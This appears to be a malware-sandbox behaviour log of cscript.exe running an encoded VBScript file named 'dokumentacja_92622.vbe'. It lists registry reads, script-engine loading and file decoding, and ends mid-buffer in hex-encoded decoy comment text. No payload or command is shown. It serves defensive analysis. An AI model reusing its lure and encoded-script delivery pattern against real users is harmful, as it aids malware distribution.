# Flog Txt Version 1
# Analyzer Version: 3.0.1
# Analyzer Build Date: Apr 26 2019 07:34:03
# Log Creation Date: 30.04.2019 10:37:39.605

Process:
	id = "1"
	image_name = "cscript.exe"
	filename = "c:\\windows\\system32\\cscript.exe"
	page_root = "0x346d2000"
	os_pid = "0xb40"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "analysis_target"
	parent_id = "0"
	os_parent_pid = "0x0"
	cmd_line = "\"C:\\Windows\\System32\\CScript.exe\"  \"C:\\Users\\5P5NRG~1\\Desktop\\dokumentacja_92622.vbe\" "
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1
	os_tid = 0xb44

	[0196.202] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f990 | out: lpSystemTimeAsFileTime=0x28f990*(dwLowDateTime=0x2cccfe00, dwHighDateTime=0x1d4ff41)) 
	[0196.202] GetCurrentProcessId () returned 0xb40
	[0196.202] GetCurrentThreadId () returned 0xb44
	[0196.202] GetTickCount () returned 0x37de5
	[0196.202] QueryPerformanceCounter (in: lpPerformanceCount=0x28f998 | out: lpPerformanceCount=0x28f998*=26965335422) returned 1
	[0196.203] GetModuleHandleA (lpModuleName=0x0) returned 0xff910000
	[0196.203] GetVersionExA (in: lpVersionInformation=0x28f880*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x28f880*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0196.203] GetUserDefaultLCID () returned 0x409
	[0196.204] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e30000
	[0196.204] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40
	[0196.204] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0196.205] FreeLibrary (hLibModule=0x76e30000) returned 1
	[0196.205] GetCommandLineW () returned="\"C:\\Windows\\System32\\CScript.exe\"  \"C:\\Users\\5P5NRG~1\\Desktop\\dokumentacja_92622.vbe\" "
	[0196.205] lstrlenW (lpString="\"C:\\Windows\\System32\\CScript.exe\"  \"C:\\Users\\5P5NRG~1\\Desktop\\dokumentacja_92622.vbe\" ") returned 86
	[0196.206] GetCurrentThreadId () returned 0xb44
	[0196.206] CoInitialize (pvReserved=0x0) returned 0x0
	[0197.585] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f548 | out: phkResult=0x28f548*=0x88) returned 0x0
	[0197.585] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f540 | out: phkResult=0x28f540*=0x8c) returned 0x0
	[0197.585] RegQueryValueExW (in: hKey=0x8c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x28e848, lpData=0x28ec50, lpcbData=0x28e840*=0x400 | out: lpType=0x28e848*=0x0, lpData=0x28ec50*=0x1, lpcbData=0x28e840*=0x400) returned 0x2
	[0197.586] RegQueryValueExW (in: hKey=0x88, lpValueName="Enabled", lpReserved=0x0, lpType=0x28e848, lpData=0x28ec50, lpcbData=0x28e840*=0x400 | out: lpType=0x28e848*=0x0, lpData=0x28ec50*=0x1, lpcbData=0x28e840*=0x400) returned 0x2
	[0197.586] RegQueryValueExW (in: hKey=0x8c, lpValueName="Enabled", lpReserved=0x0, lpType=0x28e848, lpData=0x28ec50, lpcbData=0x28e840*=0x400 | out: lpType=0x28e848*=0x0, lpData=0x28ec50*=0x1, lpcbData=0x28e840*=0x400) returned 0x2
	[0197.586] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
	[0197.594] RegCloseKey (hKey=0x8c) returned 0x0
	[0197.594] RegCloseKey (hKey=0x88) returned 0x0
	[0197.594] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f260 | out: phkResult=0x28f260*=0x88) returned 0x0
	[0197.594] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f258 | out: phkResult=0x28f258*=0x8c) returned 0x0
	[0197.594] RegQueryValueExW (in: hKey=0x8c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x28e568, lpData=0x28e970, lpcbData=0x28e560*=0x400 | out: lpType=0x28e568*=0x0, lpData=0x28e970*=0x0, lpcbData=0x28e560*=0x400) returned 0x2
	[0197.594] RegQueryValueExW (in: hKey=0x88, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x28e568, lpData=0x28e970, lpcbData=0x28e560*=0x400 | out: lpType=0x28e568*=0x0, lpData=0x28e970*=0x0, lpcbData=0x28e560*=0x400) returned 0x2
	[0197.594] RegQueryValueExW (in: hKey=0x8c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x28e568, lpData=0x28e970, lpcbData=0x28e560*=0x400 | out: lpType=0x28e568*=0x0, lpData=0x28e970*=0x0, lpcbData=0x28e560*=0x400) returned 0x2
	[0197.595] RegCloseKey (hKey=0x8c) returned 0x0
	[0197.595] RegCloseKey (hKey=0x88) returned 0x0
	[0197.595] GetACP () returned 0x4e4
	[0197.595] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e30000
	[0197.595] GetProcAddress (hModule=0x76e30000, lpProcName="HeapSetInformation") returned 0x76e4c4a0
	[0197.595] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0197.595] FreeLibrary (hLibModule=0x76e30000) returned 1
	[0197.595] ??2@YAPEAX_K@Z () returned 0x45df90
	[0197.595] CoRegisterMessageFilter (in: lpMessageFilter=0x45df90, lplpMessageFilter=0x45dfa0 | out: lplpMessageFilter=0x45dfa0*=0x0) returned 0x0
	[0197.595] IUnknown:AddRef (This=0x45df90) returned 0x2
	[0197.595] GetModuleFileNameW (in: hModule=0xff910000, lpFilename=0x28f5a0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\CScript.exe" (normalized: "c:\\windows\\system32\\cscript.exe")) returned 0x1f
	[0197.595] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\CScript.exe", lpdwHandle=0x28eef0 | out: lpdwHandle=0x28eef0) returned 0x704
	[0197.595] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\CScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x28e7e0 | out: lpData=0x28e7e0) returned 1
	[0197.595] VerQueryValueW (in: pBlock=0x28e7e0, lpSubBlock="\\", lplpBuffer=0x28eef8, puLen=0x28eef4 | out: lplpBuffer=0x28eef8*=0x28e808, puLen=0x28eef4) returned 1
	[0197.595] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x28ef48 | out: phkResult=0x28ef48*=0x88) returned 0x0
	[0197.596] RegQueryValueExW (in: hKey=0x88, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x28e298, lpData=0x28e6a0, lpcbData=0x28e290*=0x400 | out: lpType=0x28e298*=0x0, lpData=0x28e6a0*=0x0, lpcbData=0x28e290*=0x400) returned 0x2
	[0197.596] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x28ef00 | out: phkResult=0x28ef00*=0x8c) returned 0x0
	[0197.596] RegQueryValueExW (in: hKey=0x8c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x28eec4, lpData=0x28ef40, lpcbData=0x28eec0*=0x4 | out: lpType=0x28eec4*=0x0, lpData=0x28ef40*=0x70, lpcbData=0x28eec0*=0x4) returned 0x2
	[0197.596] RegQueryValueExW (in: hKey=0x8c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x28e298, lpData=0x28e6a0, lpcbData=0x28e290*=0x400 | out: lpType=0x28e298*=0x0, lpData=0x28e6a0*=0x0, lpcbData=0x28e290*=0x400) returned 0x2
	[0197.596] RegQueryValueExW (in: hKey=0x88, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x28eec4, lpData=0x28ef40, lpcbData=0x28eec0*=0x4 | out: lpType=0x28eec4*=0x0, lpData=0x28ef40*=0x70, lpcbData=0x28eec0*=0x4) returned 0x2
	[0197.596] RegQueryValueExW (in: hKey=0x88, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x28e298, lpData=0x28e6a0, lpcbData=0x28e290*=0x400 | out: lpType=0x28e298*=0x1, lpData="1", lpcbData=0x28e290*=0x4) returned 0x0
	[0197.596] lstrlenW (lpString="1") returned 1
	[0197.596] lstrlenW (lpString="0") returned 1
	[0197.596] lstrlenW (lpString="1") returned 1
	[0197.596] lstrlenW (lpString="no") returned 2
	[0197.596] lstrlenW (lpString="1") returned 1
	[0197.596] lstrlenW (lpString="false") returned 5
	[0197.596] RegCloseKey (hKey=0x8c) returned 0x0
	[0197.596] RegCloseKey (hKey=0x88) returned 0x0
	[0197.596] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x28ef48, lpdwDisposition=0x0 | out: phkResult=0x28ef48*=0x88, lpdwDisposition=0x0) returned 0x0
	[0197.596] RegQueryValueExW (in: hKey=0x88, lpValueName="Timeout", lpReserved=0x0, lpType=0x28eee4, lpData=0x28ef40, lpcbData=0x28eee0*=0x4 | out: lpType=0x28eee4*=0x0, lpData=0x28ef40*=0x70, lpcbData=0x28eee0*=0x4) returned 0x2
	[0197.596] RegQueryValueExW (in: hKey=0x88, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x28e2b8, lpData=0x28e6c0, lpcbData=0x28e2b0*=0x400 | out: lpType=0x28e2b8*=0x1, lpData="1", lpcbData=0x28e2b0*=0x4) returned 0x0
	[0197.596] lstrlenW (lpString="1") returned 1
	[0197.596] lstrlenW (lpString="0") returned 1
	[0197.596] lstrlenW (lpString="1") returned 1
	[0197.596] lstrlenW (lpString="no") returned 2
	[0197.596] lstrlenW (lpString="1") returned 1
	[0197.596] lstrlenW (lpString="false") returned 5
	[0197.596] RegCloseKey (hKey=0x88) returned 0x0
	[0197.596] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x28ef48, lpdwDisposition=0x0 | out: phkResult=0x28ef48*=0x88, lpdwDisposition=0x0) returned 0x0
	[0197.597] RegQueryValueExW (in: hKey=0x88, lpValueName="Timeout", lpReserved=0x0, lpType=0x28eee4, lpData=0x28ef40, lpcbData=0x28eee0*=0x4 | out: lpType=0x28eee4*=0x0, lpData=0x28ef40*=0x70, lpcbData=0x28eee0*=0x4) returned 0x2
	[0197.597] RegQueryValueExW (in: hKey=0x88, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x28e2b8, lpData=0x28e6c0, lpcbData=0x28e2b0*=0x400 | out: lpType=0x28e2b8*=0x0, lpData=0x28e6c0*=0x31, lpcbData=0x28e2b0*=0x400) returned 0x2
	[0197.597] RegCloseKey (hKey=0x88) returned 0x0
	[0197.597] lstrlenW (lpString="C:\\Users\\5P5NRG~1\\Desktop\\dokumentacja_92622.vbe") returned 48
	[0197.597] lstrlenW (lpString="vbe") returned 3
	[0197.597] lstrlenW (lpString="WSH") returned 3
	[0197.597] LoadStringW (in: hInstance=0xff910000, uID=0x834, lpBuffer=0x28de40, cchBufferMax=2048 | out: lpBuffer="Microsoft (R) Windows Script Host Version %1!u!.%2!u!\nCopyright (C) Microsoft Corporation. All rights reserved.\n") returned 0x70
	[0197.597] FormatMessageW (in: dwFlags=0x500, lpSource=0x37fe58, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x28ee28, nSize=0x0, Arguments=0x28ee98 | out: lpBuffer="\xecc0\x37") returned 0x6a
	[0197.597] LocalFree (hMem=0x37ecc0) returned 0x0
	[0197.597] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
	[0197.597] lstrlenW (lpString="Microsoft (R) Windows Script Host Version 5.8\r\nCopyright (C) Microsoft Corporation. All rights reserved.\r\n") returned 106
	[0197.597] GetProcessHeap () returned 0x350000
	[0197.597] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x0, Size=0xe8) returned 0x36f350
	[0197.599] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28ebf8 | out: lpMode=0x28ebf8) returned 1
	[0197.599] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x36f350*, nNumberOfCharsToWrite=0x6c, lpNumberOfCharsWritten=0x28ebf0, lpReserved=0x0 | out: lpBuffer=0x36f350*, lpNumberOfCharsWritten=0x28ebf0*=0x6c) returned 1
	[0197.600] GetProcessHeap () returned 0x350000
	[0197.600] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x36f350 | out: hHeap=0x350000) returned 1
	[0197.600] ??2@YAPEAX_K@Z () returned 0x625f30
	[0197.600] LoadStringW (in: hInstance=0xff910000, uID=0x7d1, lpBuffer=0x28d9b0, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13
	[0197.600] LoadTypeLib (in: szFile="C:\\Windows\\System32\\CScript.exe", pptlib=0x28e9f0*=0x0 | out: pptlib=0x28e9f0*=0x37f050) returned 0x0
	[0197.714] ITypeLib:GetTypeInfoOfGuid (in: This=0x37f050, GUID=0xff9249b0*(Data1=0x91afbd1b, Data2=0x5feb, Data3=0x43f5, Data4=([0]=0xb0, [1]=0x28, [2]=0xe2, [3]=0xca, [4]=0x96, [5]=0x6, [6]=0x17, [7]=0xec)), ppTInfo=0x28e9d8 | out: ppTInfo=0x28e9d8*=0x380438) returned 0x0
	[0198.187] ITypeInfo:GetRefTypeOfImplType (in: This=0x380438, index=0xffffffff, pRefType=0x28e9d0 | out: pRefType=0x28e9d0*=0xfffffffe) returned 0x0
	[0198.187] ITypeInfo:GetRefTypeInfo (in: This=0x380438, hreftype=0xfffffffe, ppTInfo=0xff92d638 | out: ppTInfo=0xff92d638*=0x380490) returned 0x0
	[0198.187] IUnknown:Release (This=0x380438) returned 0x1
	[0198.187] ??2@YAPEAX_K@Z () returned 0x6257b0
	[0198.187] ??2@YAPEAX_K@Z () returned 0x625850
	[0198.187] ??2@YAPEAX_K@Z () returned 0x6258b0
	[0198.187] ITypeLib:GetTypeInfoOfGuid (in: This=0x37f050, GUID=0xff924f50*(Data1=0x2cc5a9d0, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x28e9d8 | out: ppTInfo=0x28e9d8*=0x3804e8) returned 0x0
	[0198.187] ITypeInfo:GetRefTypeOfImplType (in: This=0x3804e8, index=0xffffffff, pRefType=0x28e9d0 | out: pRefType=0x28e9d0*=0xfffffffe) returned 0x0
	[0198.187] ITypeInfo:GetRefTypeInfo (in: This=0x3804e8, hreftype=0xfffffffe, ppTInfo=0xff92d6b8 | out: ppTInfo=0xff92d6b8*=0x380540) returned 0x0
	[0198.187] IUnknown:Release (This=0x3804e8) returned 0x1
	[0198.187] ITypeLib:GetTypeInfoOfGuid (in: This=0x37f050, GUID=0xff924f60*(Data1=0xbf64faf0, Data2=0x5906, Data3=0x426c, Data4=([0]=0xb4, [1]=0xbc, [2]=0x7b, [3]=0x75, [4]=0x3c, [5]=0xbe, [6]=0x81, [7]=0x9f)), ppTInfo=0x28e9d8 | out: ppTInfo=0x28e9d8*=0x380598) returned 0x0
	[0198.187] ITypeInfo:GetRefTypeOfImplType (in: This=0x380598, index=0xffffffff, pRefType=0x28e9d0 | out: pRefType=0x28e9d0*=0xfffffffe) returned 0x0
	[0198.187] ITypeInfo:GetRefTypeInfo (in: This=0x380598, hreftype=0xfffffffe, ppTInfo=0xff92d6f8 | out: ppTInfo=0xff92d6f8*=0x3805f0) returned 0x0
	[0198.187] IUnknown:Release (This=0x380598) returned 0x1
	[0198.187] ITypeLib:GetTypeInfoOfGuid (in: This=0x37f050, GUID=0xff924e20*(Data1=0x2cc5a9d1, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x28e9d8 | out: ppTInfo=0x28e9d8*=0x380648) returned 0x0
	[0198.187] ITypeInfo:GetRefTypeOfImplType (in: This=0x380648, index=0xffffffff, pRefType=0x28e9d0 | out: pRefType=0x28e9d0*=0xfffffffe) returned 0x0
	[0198.187] ITypeInfo:GetRefTypeInfo (in: This=0x380648, hreftype=0xfffffffe, ppTInfo=0xff92d678 | out: ppTInfo=0xff92d678*=0x3806a0) returned 0x0
	[0198.187] IUnknown:Release (This=0x380648) returned 0x1
	[0198.187] IUnknown:Release (This=0x37f050) returned 0x4
	[0198.187] ??2@YAPEAX_K@Z () returned 0x625910
	[0198.187] GetCurrentThreadId () returned 0xb44
	[0198.187] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xd8
	[0198.187] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xff9123e8, lpParameter=0x625910, dwCreationFlags=0x0, lpThreadId=0x625938 | out: lpThreadId=0x625938*=0xb5c) returned 0xe0
	[0198.188] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x28ec30*=0xd8, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0198.667] CloseHandle (hObject=0xd8) returned 1
	[0198.667] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\Desktop\\dokumentacja_92622.vbe", nBufferLength=0x104, lpBuffer=0x28ecc0, lpFilePart=0x28ecb0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\Desktop\\dokumentacja_92622.vbe", lpFilePart=0x28ecb0*="dokumentacja_92622.vbe") returned 0x30
	[0198.668] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".vbe", ulOptions=0x0, samDesired=0x20019, phkResult=0x28e1d0 | out: phkResult=0x28e1d0*=0xf2) returned 0x0
	[0198.670] RegQueryValueExW (in: hKey=0xf2, lpValueName=0x0, lpReserved=0x0, lpType=0x28e180, lpData=0x28e1e0, lpcbData=0x28e184*=0x800 | out: lpType=0x28e180*=0x1, lpData="VBEFile", lpcbData=0x28e184*=0x10) returned 0x0
	[0198.670] RegCloseKey (hKey=0xf2) returned 0x0
	[0198.670] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="VBEFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28e1d0 | out: phkResult=0x28e1d0*=0xf2) returned 0x0
	[0198.670] RegQueryValueExW (in: hKey=0xf2, lpValueName=0x0, lpReserved=0x0, lpType=0x28e180, lpData=0x28ea50, lpcbData=0x28e184*=0x200 | out: lpType=0x28e180*=0x1, lpData="VBScript.Encode", lpcbData=0x28e184*=0x20) returned 0x0
	[0198.670] RegCloseKey (hKey=0xf2) returned 0x0
	[0198.670] ??2@YAPEAX_K@Z () returned 0x6262b0
	[0198.671] GetProcessHeap () returned 0x350000
	[0198.671] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x0, Size=0x2000) returned 0x38b2b0
	[0198.671] CLSIDFromString (in: lpsz="VBScript.Encode", pclsid=0x28e9c8 | out: pclsid=0x28e9c8*(Data1=0xb54f3743, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8))) returned 0x0
	[0198.671] CoCreateInstance (in: rclsid=0x28e9c8*(Data1=0xb54f3743, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xff924828*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28e9c0 | out: ppv=0x28e9c0*=0x626580) returned 0x0
	[0199.928] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28cbc0 | out: lpSystemTimeAsFileTime=0x28cbc0*(dwLowDateTime=0x2d48c580, dwHighDateTime=0x1d4ff41)) 
	[0199.928] GetCurrentProcessId () returned 0xb40
	[0199.928] GetCurrentThreadId () returned 0xb44
	[0199.928] GetTickCount () returned 0x38111
	[0199.928] QueryPerformanceCounter (in: lpPerformanceCount=0x28cbc8 | out: lpPerformanceCount=0x28cbc8*=27337877894) returned 1
	[0199.928] malloc (_Size=0x100) returned 0x626470
	[0199.928] __dllonexit () returned 0x7fef878bfc0
	[0199.928] __dllonexit () returned 0x7fef878bfa8
	[0199.995] __dllonexit () returned 0x7fef878bfd4
	[0200.083] GetUserDefaultLCID () returned 0x409
	[0200.084] GetVersion () returned 0x1db10106
	[0200.086] ??2@YAPEAX_K@Z () returned 0x625a60
	[0200.087] ??2@YAPEAX_K@Z () returned 0x626580
	[0200.168] GetUserDefaultLCID () returned 0x409
	[0200.168] GetACP () returned 0x4e4
	[0200.169] ??3@YAXPEAX@Z () returned 0x721ee701
	[0200.169] GetCurrentThreadId () returned 0xb44
	[0200.169] ??2@YAPEAX_K@Z () returned 0x626910
	[0200.169] GetCurrentThreadId () returned 0xb44
	[0200.169] ??2@YAPEAX_K@Z () returned 0x625a60
	[0200.169] ??2@YAPEAX_K@Z () returned 0x625a90
	[0200.169] ??2@YAPEAX_K@Z () returned 0x6269f0
	[0200.169] ??2@YAPEAX_K@Z () returned 0x626ac0
	[0200.169] GetCurrentThreadId () returned 0xb44
	[0200.169] ??2@YAPEAX_K@Z () returned 0x626b00
	[0200.170] GetUserDefaultLCID () returned 0x409
	[0200.170] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
	[0200.170] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x28e920, cchData=6 | out: lpLCData="1252") returned 5
	[0200.170] IsValidCodePage (CodePage=0x4e4) returned 1
	[0200.170] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefe2b0000
	[0200.231] GetProcAddress (hModule=0x7fefe2b0000, lpProcName="CoCreateInstance") returned 0x7fefe2d7490
	[0200.231] CoCreateInstance (in: rclsid=0x7fef87dd5a8*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef87dd5b8*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x6268c8 | out: ppv=0x6268c8*=0x38f750) returned 0x0
	[0200.231] IUnknown:AddRef (This=0x38f750) returned 0x2
	[0200.231] GetCurrentProcessId () returned 0xb40
	[0200.231] GetCurrentThreadId () returned 0xb44
	[0200.232] GetTickCount () returned 0x38249
	[0200.232] ISystemDebugEventFire:BeginSession (This=0x38f750, guidSourceID=0x7fef87dd5d8, strSessionName="VBScript:00002880:00002884:18229961") returned 0x0
	[0200.232] GetCurrentThreadId () returned 0xb44
	[0200.232] ??2@YAPEAX_K@Z () returned 0x626b90
	[0200.232] ??2@YAPEAX_K@Z () returned 0x626be0
	[0200.232] malloc (_Size=0x80) returned 0x626ce0
	[0200.232] malloc (_Size=0x108) returned 0x626d70
	[0200.232] GetCurrentThreadId () returned 0xb44
	[0200.232] ??2@YAPEAX_K@Z () returned 0x626e80
	[0200.232] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\Desktop\\dokumentacja_92622.vbe" (normalized: "c:\\users\\5p5nrg~1\\desktop\\dokumentacja_92622.vbe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x10c
	[0200.232] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c87
	[0200.232] CreateFileMappingA (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1c87, lpName=0x0) returned 0x110
	[0200.232] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x140000
	[0200.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x140000, cbMultiByte=7303, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7303
	[0200.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x140000, cbMultiByte=7303, lpWideCharStr=0x392568, cchWideChar=7303 | out: lpWideCharStr="\x27\x4d\x61\x72\x6a\x6f\x72\x69\x65\x20\x43\x61\x6d\x65\x72\x6f\x6e\x20\x28\x41\x70\x72\x69\x6c\x20\x32\x33\x2c\x20\x31\x39\x32\x32\x20\xe2\x20ac\x201c\x20\x4a\x75\x6e\x65\x20\x32\x34\x2c\x20\x31\x39\x39\x35\x29\x20\x77\x61\x73\x20\x61\x6e\x20\x41\x6d\x65\x72\x69\x63\x61\x6e\x20\x61\x72\x74\x69\x73\x74\x2c\x20\x70\x6f\x65\x74\x2c\x20\x61\x63\x74\x72\x65\x73\x73\x2c\x20\x61\x6e\x64\x20\x6f\x63\x63\x75\x6c\x74\x69\x73\x74\x2e\x20\x41\x66\x74\x65\x72\x20\x73\x65\x72\x76\x69\x6e\x67\x20\x69\x6e\x20\x74\x68\x65\x20\x6e\x61\x76\x79\x20\x64\x75\x72\x69\x6e\x67\x20\x74\x68\x65\x20\x53\x65\x63\x6f\x6e\x64\x20\x57\x6f\x72\x6c\x64\x20\x57\x61\x72\x2c\x20\x0d\x0a\x27\x73\x68\x65\x20\x73\x65\x74\x74\x6c\x65\x64\x20\x69\x6e\x20\x50\x61\x73\x61\x64\x65\x6e\x61\x2c\x20\x43\x61\x6c\x69\x66\x6f\x72\x6e\x69\x61\x2e\x20\x54\x68\x65\x72\x65\x20\x73\x68\x65\x20\x6d\x65\x74\x20\x74\x68\x65\x20\x72\x6f\x63\x6b\x65\x74\x20\x70\x69\x6f\x6e\x65\x65\x72\x20\x4a\x61\x63\x6b\x20\x50\x61\x72\x73\x6f\x6e\x73\x2c\x20\x77\x68\x6f\x6d\x20\x73\x68\x65\x20\x6d\x61\x72\x72\x69\x65\x64\x20\x69\x6e\x20\x31\x39\x34\x36\x2e\x20\x41\x66\x74\x65\x72\x20\x50\x61\x72\x73\x6f\x6e\x73\x27\x20\x64\x65\x61\x74\x68\x20\x69\x6e\x20\x61\x6e\x20\x65\x78\x70\x6c\x6f\x73\x69\x6f\x6e\x20\x61\x74\x20\x74\x68\x65\x69\x72\x20\x68\x6f\x6d\x65\x20\x69\x6e\x20\x31\x39\x35\x32\x2c\x20\x0d\x0a\x27\x43\x61\x6d\x65\x72\x6f\x6e\x20\x63\x61\x6d\x65\x20\x74\x6f\x20\x73\x75\x73\x70\x65\x63\x74\x20\x74\x68\x61\x74\x20\x68\x65\x72\x20\x68\x75\x73\x62\x61\x6e\x64\x20\x68\x61\x64\x20\x62\x65\x65\x6e\x20\x61\x73\x73\x61\x73\x73\x69\x6e\x61\x74\x65\x64\x2c\x20\x61\x6e\x64\x20\x62\x65\x67\x61\x6e\x20\x72\x69\x74\x75\x61\x6c\x73\x20\x74\x6f\x20\x63\x6f\x6d\x6d\x75\x6e\x69\x63\x61\x74\x65\x20\x77\x69\x74\x68\x20\x68\x69\x73\x20\x73\x70\x69\x72\x69\x74\x2e\x20\x53\x68\x65\x20\x77\x61\x73\x20\x70\x61\x72\x74\x20\x6f\x66\x2